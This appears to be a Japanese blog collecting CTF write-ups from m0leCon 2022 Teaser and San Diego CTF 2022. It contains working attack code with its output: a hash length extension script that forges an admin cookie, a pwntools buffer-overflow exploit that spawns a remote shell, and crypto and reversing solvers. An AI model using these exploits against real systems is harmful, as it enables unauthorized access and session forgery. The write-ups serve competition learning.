　　　・ct_block_int: block_intとctr_intのXOR
　　　・ct_block: ct_block_intの文字列化
　　　・ctr_int = (ctr_int + 1) % (2 ** 128)
　　　・ct_blockを結合した文字列を返却

機能的にLCGパラメータの各値は256未満。mを256に固定し、a, b, x0でブルートフォースし、平文と暗号文の関係を満たすものを探す。パラメータを割り出したら、それを元に暗号文を復号すると、最終行にフラグがあるはず。

#!/usr/bin/env python3
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from Crypto.Util.strxor import strxor

class LCG(object):
    def __init__(self, a, b, m, x0):
        self.a = a
        self.b = b
        self.m = m
        self.x0 = x0

    def get_byte(self):
        self.x0 = (self.a * self.x0 + self.b) % self.m

        return self.x0.to_bytes(1, byteorder='big')

def encrypt(key, iv, plaintext):
    encryptor = Cipher(algorithms.AES(key), modes.ECB()).encryptor()

    ciphertext = b''
    plaintext = plaintext + b'\x00' * (16 - len(plaintext) % 16)
    ctr = encryptor.update(iv) + encryptor.finalize()
    ctr_int = int.from_bytes(ctr, byteorder='big')

    pt_blocks = []
    for i in range(0, len(plaintext), 16):
        pt_blocks.append(plaintext[i:i+16])

    for block in pt_blocks:
        block_int = int.from_bytes(block, byteorder='big')
        ct_block_int = block_int ^ ctr_int
        ct_block = ct_block_int.to_bytes(16, byteorder='big')
        ctr_int = (ctr_int + 1) % (2 ** 128)
        ciphertext += ct_block

    return ciphertext


def decrypt(key, iv, ciphertext):
    encryptor = Cipher(algorithms.AES(key), modes.ECB()).encryptor()

    plaintext = b''
    ctr = encryptor.update(iv) + encryptor.finalize()

    ct_blocks = []
    for i in range(0, len(ciphertext), 16):
        ct_blocks.append(ciphertext[i:i + 16])

    for block in ct_blocks:
        block_int = int.from_bytes(block, byteorder='big')
        ctr_int = int.from_bytes(ctr, byteorder='big')
        pt_block_int = block_int ^ ctr_int
        pt_block = pt_block_int.to_bytes(16, byteorder='big')
        ctr = ((ctr_int + 1) % (2 ** 128)).to_bytes(16, byteorder='big')
        plaintext += pt_block.rstrip(b'\x00')

    return plaintext

with open('poem.txt', 'rb') as f:
    lines = f.read().splitlines()

with open('poem.txt.enc', 'rb') as f:
    ct = f.read()

ct_size = []
for line in lines:
    ct_size.append((len(line) // 16 + 1) * 16)
ct_size[-1] = len(ct) - sum(ct_size[:-1])

pt0 = lines[0]
ct0 = ct[:ct_size[0]]

m = 256
found = False
for a in range(256):
    for b in range(256):
        for x0 in range(256):
            generator = LCG(a, b, m, x0)
            iv, key = b'', b''
            for _ in range(16):
                iv += generator.get_byte()
            for _ in range(16):
                key += generator.get_byte()
            ct_block = encrypt(key, iv, pt0)
            if ct_block == ct0:
                found = True
                print('[+] a =', a)
                print('[+] b =', b)
                print('[+] m =', m)
                print('[+] x0 =', x0)
                break
        if found:
            break
    if found:
        break

generator = LCG(a, b, m, x0)

index = 0
for size in ct_size:
    iv, key = b'', b''
    for _ in range(16):
        iv += generator.get_byte()
    for _ in range(16):
        key += generator.get_byte()
    pt_block = decrypt(key, iv, ct[index:index + size]).decode()
    print(pt_block)
    index += size

実行結果は以下の通り。

[+] a = 113
[+] b = 7
[+] m = 256
[+] x0 = 13
Over hill, over dale,
Thorough bush, thorough brier,
Over park, over pale,
Thorough flood, thorough fire!
I do wander everywhere,
Swifter than the moon's sphere;
And I serve the Fairy Queen,
To dew her orbs upon the green;
The cowslips tall her pensioners be;
In their gold coats spots you see;
Those be rubies, fairy favours;
In those freckles live their savours;
I must go seek some dewdrops here,
And hang a pearl in every cowslip's ear.
tw0_t1m3_p4d_1s_st1ll_tw0_t1m3_p4d

tw0_t1m3_p4d_1s_st1ll_tw0_t1m3_p4d

2022-05-17

m0leCon CTF 2022 Teaser Writeup

CTF writeup

この大会は2022/5/14 2:00(JST)～2022/5/15 2:00(JST)に開催されました。
今回もチームで参戦。結果は176点で577チーム中70位でした。
自分で解けた問題をWriteupとして書いておきます。

Sanity Check (misc, warmup)

問題にフラグが書いてあった。

ptm{pl3453_54v3_4_7r33_d0n7_pr1n7_7h15_fl46}

Fancy Notes (web, crypto, warmup)

cookieに以下のbase64文字列が設定される。

username=[username],locale=en|[sha256(SECRET_KEY + [username],locale=en)]

Hash Length Extension Attackで攻撃する。
まずusername=noraでログインすると、クッキーのuserに以下が設定されている。

dXNlcm5hbWU9bm9yYSxsb2NhbGU9ZW58YzBmYmU3MzA2YjMwMjIxYzMzZDAzNDFlZjEzZjVlMjBkNmYxODM1NzYwODkzMTZlZDFmM2Y0ODM0MGU4ZTg1Zg==

base64デコードする。

$ echo dXNlcm5hbWU9bm9yYSxsb2NhbGU9ZW58YzBmYmU3MzA2YjMwMjIxYzMzZDAzNDFlZjEzZjVlMjBkNmYxODM1NzYwODkzMTZlZDFmM2Y0ODM0MGU4ZTg1Zg== | base64 -d
username=nora,locale=en|c0fbe7306b30221c33d0341ef13f5e20d6f183576089316ed1f3f48340e8e85f

",username=admin"を追加して、そのハッシュを求め、定型データにした後、base64 エンコードし、クッキーに設定し、リクエストする。これをSECRET_KEYのサイズのブルートフォースでフラグが表示されるものを探す。

#!/usr/bin/env python3
import requests
import hashpumpy
import base64
import re
import warnings

warnings.simplefilter('ignore')

url = 'https://fancynotes.m0lecon.fans/notes'

known_hash = 'c0fbe7306b30221c33d0341ef13f5e20d6f183576089316ed1f3f48340e8e85f'
known_str = 'username=nora,locale=en'
add_data = ',username=admin'

for key_size in range(1, 50):
    h, d = hashpumpy.hashpump(known_hash, known_str, add_data, key_size)
    cookie_user = base64.b64encode(d + b'|' + h.encode()).decode()
    cookie = {'user': cookie_user}
    r = requests.get(url, cookies=cookie)
    if 'ptm{' in r.text:
        print('[+] SECRET_KEY size:', key_size)
        print('[+] Cookie: user =', cookie_user)
        pattern = '(ptm\{.+\})'
        m = re.search(pattern, r.text)
        flag = m.group(1)
        print('[*] flag:', flag)
        break

実行結果は以下の通り。

[+] SECRET_KEY size: 19
[+] Cookie: user = dXNlcm5hbWU9bm9yYSxsb2NhbGU9ZW6AAAAAAAAAAAAAAAAAAAAAAAAAAAFQLHVzZXJuYW1lPWFkbWlufGExMDcxZWM4NTM4ODBjNDVkMWY3ZjM4NjYzNWViOGU1MjFhYzNlMDk5MjYyMWVlNWUyZjVhOTE2N2FmMTljNzA=
[*] flag: ptm{pleaseD0NOTUseCr3am1nCarbon4r4!}

ptm{pleaseD0NOTUseCr3am1nCarbon4r4!}

MOO (crypto, warmup)

サーバの処理概要は以下の通り。

・p, pfs = gen_prime()
　・以下繰り返し
　　・cnt = 0
　　・p = 1
　　・fs = []
　　・cntが4未満の間繰り返し
　　　・e: 1～3のランダム値
　　　・x: 1～2**128のランダム値の次の素数
　　　・p *= x**e
　　　・cnt += e
　　　・fsに(x, e)を追加
　　　・2 * p + 1が素数の場合
　　　　・fsに(2, 1)を追加
　　　　・2 * p + 1, fsを返却
・q, qfs = gen_prime()
・n = p * q
・e = 65537
・c = pow(flag, e, n)
・n, c, eを表示
・10回以下繰り返し
　・g: 数値入力(g % n > 0)
　・M = int(f2(g, (p, q), (pfs, qfs)))
　　・mofs = (f1(g, p, pfs), f1(g, q, qfs))
　　・lcm(mofs[0], mofs[1])を返却
　・Mを表示

いろいろ試してみた結果、10回のMのLCMをMとすると、以下のようになる。

M * 2 == (p - 1) * (q - 1)

これはphiの値と同じ。あとは通常通りRSA暗号の復号方法で復号する。

#!/usr/bin/env python3
import socket
from functools import reduce
from gmpy2 import lcm
from Crypto.Util.number import *

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('challs.m0lecon.it', 1753))

data = recvuntil(s, b'\n').rstrip()
print(data)
data = recvuntil(s, b'\n').rstrip()
print(data)
n = int(data.split(' ')[-1])
data = recvuntil(s, b'\n').rstrip()
print(data)
c = int(data.split(' ')[-1])
data = recvuntil(s, b'\n').rstrip()
print(data)
e = int(data.split(' ')[-1])

MS = []
for g in [2, 3, 5, 7, 11, 13, 17, 19, 23, 27]:
    data = recvuntil(s, b': ')
    print(data + str(g))
    s.sendall(str(g).encode() + b'\n')
    data = recvuntil(s, b'\n').rstrip()
    print(data)
    M = int(data.split(' ')[-1])
    MS.append(M)

M = reduce(lcm, MS)
phi = M * 2
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m).decode()
print(flag)

実行結果は以下の通り。

Generating data...
n = 80924461791103577815850837875689177067665660234445708567868383751818584680054212313448507244659384038344296284890326734437750370989793572004432057543584093509122904180873669729045717066000876815786773368721692867813728603696567519284588068661539554205344620595619616197032933279794714455517366126694456718371958485054786951039462446603035275625576016214168193861388025096261118256254847981918655730252681107799019957520565656769423615296272038483342199962277
c = 34678191167506589626473690826771207402512855207909013228665864018996039251258639747055677874717524199976497403718168616081427221073854389668864212952920274252275639592937453805238201563942728842002703847403245420942852906355189826830449376572164310919971611166703159996155980459714493754291592255753617940295635967125247300508189411576356861614569600197002478111615705983219332020380884388259523695371993728777571638161513806749997177326679452387510245066452
e = 65537
Choose a value: 2
M = 40462230895551788907925418937844588533832830117222854283934191875909292340027106156724253622329692019172148142445163367218875185494896786002216028771792046754561452090436834864522858533000438407893386684360846433906864301848283750568281115476752022006327775818235970852463054567632754882562762652567053568179886431880992248559145873484988235549033924726342262095528474171847733648132700161835891101957238621876330616277742644684424666414473086012696739321398
Choose a value: 3
M = 20231115447775894453962709468922294266916415058611427141967095937954646170013553078362126811164846009586074071222581683609437592747448393001108014385896023377280726045218417432261429266500219203946693342180423216953432150924141875284140557738376011003163887909117985426231527283816377441281381326283526784089943215940496124279572936742494117774516962363171131047764237085923866824066350080917945550978619310938165308138871322342212333207236543006348369660699
Choose a value: 5
M = 40462230895551788907925418937844588533832830117222854283934191875909292340027106156724253622329692019172148142445163367218875185494896786002216028771792046754561452090436834864522858533000438407893386684360846433906864301848283750568281115476752022006327775818235970852463054567632754882562762652567053568179886431880992248559145873484988235549033924726342262095528474171847733648132700161835891101957238621876330616277742644684424666414473086012696739321398
Choose a value: 7
M = 20231115447775894453962709468922294266916415058611427141967095937954646170013553078362126811164846009586074071222581683609437592747448393001108014385896023377280726045218417432261429266500219203946693342180423216953432150924141875284140557738376011003163887909117985426231527283816377441281381326283526784089943215940496124279572936742494117774516962363171131047764237085923866824066350080917945550978619310938165308138871322342212333207236543006348369660699
Choose a value: 11
M = 40462230895551788907925418937844588533832830117222854283934191875909292340027106156724253622329692019172148142445163367218875185494896786002216028771792046754561452090436834864522858533000438407893386684360846433906864301848283750568281115476752022006327775818235970852463054567632754882562762652567053568179886431880992248559145873484988235549033924726342262095528474171847733648132700161835891101957238621876330616277742644684424666414473086012696739321398
Choose a value: 13
M = 20231115447775894453962709468922294266916415058611427141967095937954646170013553078362126811164846009586074071222581683609437592747448393001108014385896023377280726045218417432261429266500219203946693342180423216953432150924141875284140557738376011003163887909117985426231527283816377441281381326283526784089943215940496124279572936742494117774516962363171131047764237085923866824066350080917945550978619310938165308138871322342212333207236543006348369660699
Choose a value: 17
M = 40462230895551788907925418937844588533832830117222854283934191875909292340027106156724253622329692019172148142445163367218875185494896786002216028771792046754561452090436834864522858533000438407893386684360846433906864301848283750568281115476752022006327775818235970852463054567632754882562762652567053568179886431880992248559145873484988235549033924726342262095528474171847733648132700161835891101957238621876330616277742644684424666414473086012696739321398
Choose a value: 19
M = 40462230895551788907925418937844588533832830117222854283934191875909292340027106156724253622329692019172148142445163367218875185494896786002216028771792046754561452090436834864522858533000438407893386684360846433906864301848283750568281115476752022006327775818235970852463054567632754882562762652567053568179886431880992248559145873484988235549033924726342262095528474171847733648132700161835891101957238621876330616277742644684424666414473086012696739321398
Choose a value: 23
M = 40462230895551788907925418937844588533832830117222854283934191875909292340027106156724253622329692019172148142445163367218875185494896786002216028771792046754561452090436834864522858533000438407893386684360846433906864301848283750568281115476752022006327775818235970852463054567632754882562762652567053568179886431880992248559145873484988235549033924726342262095528474171847733648132700161835891101957238621876330616277742644684424666414473086012696739321398
Choose a value: 27
M = 20231115447775894453962709468922294266916415058611427141967095937954646170013553078362126811164846009586074071222581683609437592747448393001108014385896023377280726045218417432261429266500219203946693342180423216953432150924141875284140557738376011003163887909117985426231527283816377441281381326283526784089943215940496124279572936742494117774516962363171131047764237085923866824066350080917945550978619310938165308138871322342212333207236543006348369660699
ptm{y0u_found_another_w4y_t0_factorize}

ptm{y0u_found_another_w4y_t0_factorize}

2022-05-11

San Diego CTF 2022 Writeup

CTF writeup

この大会は2022/5/7 9:00(JST)～2022/5/9 9:00(JST)に開催されました。
今回もチームで参戦。結果は1255点で615チーム中105位でした。
自分で解けた問題をWriteupとして書いておきます。

Sanity Check (MISC 25)

問題にフラグが書いてあった。

sdctf{j3_n3_su15_p4s_un_r0b0t_!}

Ishihara test++ (MISC 100)

svgファイルで、6色が似た色になっているので、全然異なる色にして表示してみると、フラグが浮き出てきた。

sdctf{c0untle55_col0rfu1_c0lors_cov3ring_3veryth1ng}

Horoscope (PWN 100)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  char local_38 [48];
  
  puts("Welcome to SDCTF\'s very own text based horoscope");
  puts(
      "please put in your birthday and time in the format (month/day/year/time) and we will have you r very own horoscope"
      );
  fflush(stdout);
  fgets(local_38,0x140,stdin);
  processInput(local_38);
  return 0;
}

void processInput(char *param_1)

{
  char *__nptr;
  int local_1c;
  char *local_18;
  int local_c;
  
  __nptr = strtok(param_1,"/");
  for (local_1c = 0; local_1c < 4; local_1c = local_1c + 1) {
    if (local_1c == 0) {
      local_c = atoi(__nptr);
    }
    if (local_1c == 3) {
      atoi(__nptr);
    }
  }
  switch(local_c) {
  default:
    puts("thats not a valid date >:-(");
    fflush(stdout);
                    /* WARNING: Subroutine does not return */
    exit(1);
  case 1:
    local_18 = "January";
    break;
  case 2:
    local_18 = "February";
    break;
  case 3:
    local_18 = "March";
    break;
  case 4:
    local_18 = "April";
    break;
  case 5:
    local_18 = "May";
    break;
  case 6:
    local_18 = "June";
    break;
  case 7:
    local_18 = "July";
    break;
  case 8:
    local_18 = "August";
    break;
  case 9:
    local_18 = "September";
    break;
  case 10:
    local_18 = "October";
    break;
  case 0xb:
    local_18 = "November";
    break;
  case 0xc:
    local_18 = "December";
  }
  printf("wow, you were born in the month of %s. I think that means you will have a great week! :)",
         local_18);
  fflush(stdout);
  return;
}

void debug(void)

{
  temp = 1;
  return;
}

void test(void)

{
  if (temp == 1) {
    system("/bin/sh");
  }
  return;
}

$ gdb -q ./horoscope
Reading symbols from ./horoscope...(no debugging symbols found)...done.
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/horoscope 
Welcome to SDCTF's very own text based horoscope
please put in your birthday and time in the format (month/day/year/time) and we will have your very own horoscope
1/AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
wow, you were born in the month of January. I think that means you will have a great week! :)
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7af2104 (<__GI___libc_write+20>:	cmp    rax,0xfffffffffffff000)
RDX: 0x0 
RSI: 0x7ffff7dcf8c0 --> 0x0 
RDI: 0x1 
RBP: 0x4141314141624141 ('AAbAA1AA')
RSP: 0x7fffffffde08 ("GAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
RIP: 0x4007bc (<main+101>:	ret)
R8 : 0x7ffff7dcf8c0 --> 0x0 
R9 : 0x7ffff7fde4c0 (0x00007ffff7fde4c0)
R10: 0xfffffff9 
R11: 0x246 
R12: 0x400670 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdee0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4007b1 <main+90>:	call   0x4007bd <processInput>
   0x4007b6 <main+95>:	mov    eax,0x0
   0x4007bb <main+100>:	leave  
=> 0x4007bc <main+101>:	ret    
   0x4007bd <processInput>:	push   rbp
   0x4007be <processInput+1>:	mov    rbp,rsp
   0x4007c1 <processInput+4>:	sub    rsp,0x40
   0x4007c5 <processInput+8>:	mov    QWORD PTR [rbp-0x38],rdi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde08 ("GAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0008| 0x7fffffffde10 ("AHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0016| 0x7fffffffde18 ("AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0024| 0x7fffffffde20 ("4AAJAAfAA5AAKAAgAA6AAL\n")
0032| 0x7fffffffde28 ("A5AAKAAgAA6AAL\n")
0040| 0x7fffffffde30 --> 0xa4c4141364141 ('AA6AAL\n')
0048| 0x7fffffffde38 --> 0x3c44afd41a0b7a64 
0056| 0x7fffffffde40 --> 0x400670 (<_start>:	xor    ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004007bc in main ()
gdb-peda$ patto GAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
GAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 54

BOFで"1/"+ 任意の54バイトの後にdebug関数のアドレスを配置し、リターンアドレスの位置にtest関数のアドレスを配置する。

from pwn import *

if len(sys.argv) == 1:
    p = remote('horoscope.sdc.tf', 1337)
else:
    p = process('./horoscope')

elf = ELF('./horoscope')

debug_addr = elf.symbols['debug']
test_addr = elf.symbols['test']

payload = b'1/' + b'A' * 54
payload += p64(debug_addr)
payload += p64(test_addr)

data = p.recvline().rstrip().decode()
print(data)
data = p.recvline().rstrip().decode()
print(data)
print(payload)
p.sendline(payload)
data = p.recvuntil(b':)').decode()
print(data)
p.interactive()

実行結果は以下の通り。

[+] Opening connection to horoscope.sdc.tf on port 1337: Done
[*] '/mnt/hgfs/Shared/horoscope'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Welcome to SDCTF's very own text based horoscope
please put in your birthday and time in the format (month/day/year/time) and we will have your very own horoscope
b'1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAn\t@\x00\x00\x00\x00\x00P\t@\x00\x00\x00\x00\x00'
wow, you were born in the month of January. I think that means you will have a great week! :)
[*] Switching to interactive mode
$ ls
flag.txt
horoscope
$ cat flag.txt
sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}

sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}

Oracle (REVENGE 130)

Bytecode Viewerでデコンパイルする。

import java.io.Console;

public class Oracle {
   private static final int FLAG_LENGTH = 42;
   private static final byte[] CHECK = new byte[]{48, 6, 122, -86, -73, -59, 78, 84, 105, -119, -36, -118, 70, 17, 101, -85, 55, -38, -91, 32, -18, -107, 53, 99, -74, 67, 89, 120, -41, 122, -100, -70, 34, -111, 21, -128, 78, 27, 123, -103, 36, 87};
   private static byte[] numbers;

   private static void firstPass() {
      for(int var0 = 0; var0 < 42; ++var0) {
         byte[] var10000 = numbers;
         var10000[var0] = (byte)(var10000[var0] ^ 3 * var0 * var0 + 5 * var0 + 101 + var0 % 2);
      }

   }

   private static void secondPass() {
      byte[] var0 = new byte[42];

      for(int var1 = 0; var1 < 42; ++var1) {
         var0[var1] = (byte)(numbers[(var1 + 42 - 1) % 42] << 4 | (numbers[var1] & 255) >> 4);
      }

      numbers = var0;
   }

   private static void thirdPass() {
      for(int var0 = 0; var0 < 42; ++var0) {
         byte[] var10000 = numbers;
         var10000[var0] = (byte)(var10000[var0] + 7 * var0 * var0 + 31 * var0 + 127 + var0 % 2);
      }

   }

   private static void fail() {
      System.out.println("That's not the flag. Try again.");
      System.exit(1);
   }

   public static void main(String[] var0) {
      Console var1 = System.console();
      numbers = var1.readLine("Enter flag: ").getBytes();
      if (numbers.length != 42) {
         fail();
      }

      firstPass();
      secondPass();
      thirdPass();
      int var2 = 0;

      for(int var3 = 0; var3 < 42; ++var3) {
         var2 |= CHECK[var3] ^ numbers[var3];
      }

      if (var2 != 0) {
         fail();
      }

      System.out.println("Good job. You found the flag!");
   }
}

フラグは以下の条件を満たす必要がある。

・長さが42バイト
・firstPass, secondPass, thirdPass実行後にvar2の計算で0になる。

ある文字と前後の文字が影響を受けるので、1文字ずつ条件を満たすものをブルートフォースで求める。このとき、フラグは"}"で終わることを前提にコードにした。

public class Solve {
    private static final byte[] CHECK = new byte[]{48, 6, 122, -86, -73, -59, 78, 84, 105, -119, -36, -118, 70, 17, 101, -85, 55, -38, -91, 32, -18, -107, 53, 99, -74, 67, 89, 120, -41, 122, -100, -70, 34, -111, 21, -128, 78, 27, 123, -103, 36, 87};

    private static byte firstPass1(byte num, int i) {
        return (byte)(num ^ 3 * i * i + 5 * i + 101 + i % 2);
    }

    private static byte secondPass1(byte num0, byte num1) {
        return (byte)(num0 << 4 | (num1 & 255) >> 4);
    }

    private static byte thirdPass1(byte num, int i) {
        return (byte)(num + 7 * i * i + 31 * i + 127 + i % 2);
    }

    private static byte allPass1(byte pre, byte cur, int pre_i, int cur_i) {
        byte v0, v1, v2, v3;

        v0 = firstPass1(pre, pre_i);
        v1 = firstPass1(cur, cur_i);
        v2 = secondPass1(v0, v1);
        v3 = thirdPass1(v2, cur_i);
        return v3;
    }

    public static void main(String[] args) {
        byte cur_v, next_v;
        byte[] flag = new byte[42];
        flag[41] = (byte)'}';

        for (int i = 0; i < 41; i++) {
            for (int code = 32; code < 127; code++) {
                int preIndex = (i + 42 - 1) % 42;
                cur_v = allPass1(flag[preIndex], (byte)code, preIndex, i);
                if (cur_v == CHECK[i]) {
                    boolean found = false;
                    for (int code2 = 32; code2 < 127; code2++) {
                        next_v = allPass1((byte)code, (byte)code2, i, i + 1);
                        if (next_v == CHECK[i + 1]) {
                            found = true;
                            break;
                        }
                    }
                    if (found == true) {
                        flag[i] = (byte)code;
                        break;
                    }
                }
            }
        }
        System.out.println(new String(flag));
    }
}

sdctf{u_f0und_th3_LANGu4ge_0f_th1s_0r4cl3}

Flag Trafficker (FORENSICS 150)

httpでフィルタリングする。
No.5732のパケットで、以下のようなHTMLデータがあった。

<!DOCTYPE html>
<html>
<body>
<button type="button"
onclick="[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!